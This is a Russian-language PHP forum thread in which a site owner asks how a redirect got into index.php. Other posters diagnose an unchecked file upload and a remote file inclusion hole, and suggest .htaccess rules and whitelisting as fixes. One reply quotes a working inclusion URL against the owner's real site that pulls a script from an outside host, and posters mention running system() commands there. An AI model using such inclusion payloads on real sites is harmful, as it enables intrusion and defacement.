Форум PHP

Мне недавно в index.php как-то вставили редирект на другой сайт. Я конечно понимаю, что это для вас профи смешно... Подскажите - как это сделали и как от этого защититься?

Как вставлен редирект - прямо в HTML код или через текст в базе данных, который размещают посетители в гостевой книге или другом сервисе?

Хорошо, что изменили название темы.
Редирект вставлен под видом шапки - Include и т.д. (точно не помню, уже убрал). И причем красиво вставлен. Такое впечатление, что кто-то открыл этот файл, вставил свой код и сохранил.

Сколько человек имеет FTP-доступ к сайту? Запросите у хостера логи доступа по FTP. Прежде чем менять FTP-пароли, проверьте машину (с которой осуществляете FTP-доступ) на предмет троянов, их воорующих.

PS Ссылка на российский или на забугорный сайт?

Ссылка была на http://wapz.net.ru/. FTP-доступ только у меня, файл с паролями лежит на компе. Имеет ли смысл спрятать файлы с паролями и т.п. на флешку или куда-то ещё? Спасибо!

Администратор данного сайта посещает данный форум под ником "UnKnown". Вероятно Вы скачали один из левых скриптов с его сайта, либо, что очень вероятно, воспользовались онлайн FTP-менеджером с его сайта. Не надо пользоваться услугами таких людей.

>Администратор данного сайта посещает данный форум под ником "UnKnown". Вероятно Вы скачали один из левых скриптов с его сайта, либо, что очень вероятно, воспользовались онлайн FTP-менеджером с его сайта. Не надо пользоваться услугами таких людей.
Я использую только TotalCommander и HTTP-файлменеджер с личного кабинета хостинга (очень редко). А на тот сайт вобще никогда не заходил.

Спрячь все пароли и логины в моzги...точно никто не украдёт (100% гарантия):))))
P.S Если не получаеться запомнить то пишу на бумагу и тоже прячь её))))))))

Посмотрел логи FTP - никого кроме меня (судя по IP и времени). Хостер говорит это скорее всего "через уязвимости скриптов". Какая может быть уязвимость в такой странице - http://okarelia.ru/ ? Инклуд был вставлен в самое начало HTML-кода.

Посетители имеют возможность загружать файлы на сервер?

Да, есть возможность закачки файлов (не в корневую папку) и даже без проверки.

Хм...Че же не убираете дыру?..

Как так... срочно убирайте - если кто-нибудь загрузит PHP-файл, он сможет с вашим сайтом сделать всё, что угодно: хоть include подставить, хоть стереть все существующие файлы. Расширения файлов следует обязательно контролировать, в папке, куда загружаются файлы следует отключить выполнение всех опасных скриптов при помощи конфигурационного файла .htaccess

RemoveHandler .php .phtml .pl AddType text/html .php .phtm .htm .html .phtml .pl

http://okarelia.ru/index.php?ref=http://wen-info.com/code.script - извините, но это глупейшая ошибка.

>http://okarelia.ru/index.php?ref=http://wen-info.com/code.script - извините, но это глупейшая ошибка.
А как надо?

Проверять, чтобы не могли подставить левую информацию.

Вообще не используйте такого способа передачи данных передавайте цифры 1, 2, 3 и т.д. а необходимые данные излекайте из массива

<?php   $arr = array(1 => "index.php", 2 => "upload/index.php", 3 => ...); ?>

Большое спасибо! Буду знать.

Прятать имеет смысл, кроме того, машину с которой осуществляется доступ на защищённые паролем ресурсы следует - защищать (в обязательном порядке иметь FireWall и регулярно сканировать машину на предмет троянов). FTP-пароль лучше сменить, пока чёрных ходов не оставили.

277,74 Gb of 333,55 Gb is free. - класный хостинг :D
Ещё и на OS Windows небось стоит....потому что комманды Linux не выролняются с помощью system() :D

Хостинг 1ГБ. На винде. Парни, хватит уже издиваться над сайтом :)) Всё перекорёжили. Я недавно изучаю PHP, до безопасности ещё не дошел.